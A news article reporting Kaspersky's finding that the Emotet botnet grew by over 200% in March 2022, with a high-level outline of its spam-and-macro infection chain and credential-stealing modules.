Emotet, a botnet described by Europol as “the most dangerous malware in the world”, showed a global growth of over 200% during March 2022.
This was revealed by telemetry data from Kaspersky, who says the growth indicates that the bad actors behind the botnet have been taking steps to dramatically increase their malicious activity for the first time since its comeback in November last year.
Emotet is not only a botnet, it is a malware that is capable of extracting different kinds of data, often pertaining to finance, from infected devices.
Operated by experienced malefactors, Emotet has become one of the biggest players in the cyber crime world. It was shut down following a joint effort from various law enforcement agencies from different countries in January last year, but resurrected itself in November, and has been gradually increasing its activity since.
It’s doing this firstly, by spreading via Trickbot, a different bot network, and now by itself via the means of malicious spam campaigns.
The number of victims shot up from 2 843 in February 2022 to 9 086 in March, attacking over three times the number of users, says Kaspersky. The number of attacks escalated accordingly too, from 16 897 in February to 48 597 in March.
How it works
A typical Emotet infection starts with spam e-mails that contain Microsoft Office attachments with a malicious macro.
Using this macro, the attacker can execute a malicious PowerShell command to drop and start a module loader, which can then communicate with a command and control sever to download and start modules.
These modules have the ability to perform a range of different tasks on the infected device. Researchers were able to retrieve and analyse 10 out of 16 modules, with most having been used by Emotet in the past in one form or another.
The current version of Emotet can create automated spam campaigns that are spread down the network from the infected devices, extracting emails and email addresses from Thunderbird and Outlook applications and collecting passwords from popular Web browsers, such as IE, Firefox, Chrome, Safari and Opera, to gather the account details of various email clients.
Alexey Shulmin, a security researcher at Kaspersky, says the takedown of the botnet was a significant step towards decreasing threats worldwide by helping to tear apart their network and removing it from the top threat list for over a year.
“While the number of attacks is not comparable to the previous scale of Emotet’s operations, the change in dynamics points to a significant activation of the botnet’s operators and a high likelihood of this threat spreading further in the coming months,” Shulmin says.
Share